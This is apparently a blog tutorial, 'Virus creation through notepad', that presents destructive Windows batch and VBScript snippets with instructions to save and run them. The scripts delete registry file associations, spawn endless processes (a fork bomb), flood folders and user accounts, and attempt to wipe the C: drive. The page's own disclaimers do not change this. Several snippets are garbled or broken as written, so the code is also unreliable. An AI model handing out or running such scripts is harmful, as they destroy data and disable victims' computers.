Virus creation through notepad

Virus creation through notepad

First of all, what is batch scripting, those who don’t know, take a look below:
“It is simply a text file, containing a series of commands, which are executed automatically, line by line when the batch file runs.”
By using Batch File you can create an extremely dangerous virus which can delete the Windows files, format different drives [C:\, E:], steal data files and information, disable antivirus, firewall, etc.
NOTE: This post is solely and mainly for educational purpose only. I am nowhere responsible for any kind of damage caused by this tutorial
Note: I am not responsible for any damage or error reporting on Your PC, do it at your own risk.
Warning: Do not try this on your daily working PC.

Delete Key Registry Files

This will delete key registry files, then loops a message.This is dangerous and unrecoverable Notepad Virus.
step1: open Note Pad and paste below code
@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your PC has been crashed.Your Dad.
 GOTO MESSAGE
           step2: save the above notepad text as anyname.bat   . execute this bat file.
Endless Notepads
This will pop up endless notepads until the computer freezes and crashes
@ECHO off
 :top
 START %SystemRoot%\system32\notepad.exe
 GOTO top

 Endless Enter

This will make the enter button pressed continuously
Set wshShell = wscript.CreateObject(”WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “~(enter)”
 loop

 Application Bomber

It will start to open different applications repeatedly which will affect the system’s performance.

You can also add the application of your choice in the above code.
@echo off
 :x
 start winword
 start mspaint
 start notepad
 start write
 start cmd
 start explorer
 start control
 start calc
 goto x

Folder Flooder

This will create unlimited no. of folders.
@echo off
:x
md %random%
/folder.
goto x

User Account Flooder

This will create large no. of the user account on one’s PC and goes on
@echo off
:xnet
user %random% /add
goto x

Process Creator

This will create unlimited background processes
%0|%0

Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable
@Echo off
Del C:\ *.* |y

Comments